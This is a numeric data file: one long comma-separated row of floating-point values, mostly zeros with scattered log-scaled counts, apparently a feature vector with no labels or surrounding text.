0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0, 2.4849066497880004, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 5.952096120109145, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8903717578961645, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.8289456176102075, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0, 0.0, 2.302585092994046, 2.772588722239781, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.672828834461906, 0, 0.0, 0.0, 3.649511027115099, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.110873864173311, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0.0, 0, 2.70805020110221, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.302585092994046, 1.9459101490553132, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.044522437723423, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.030104765080701, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.6443908991413725, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 12.444372333547394, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 2.6390573296152584, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.812184355372417, 0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 1.6094379124341003, 2.70805020110221, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 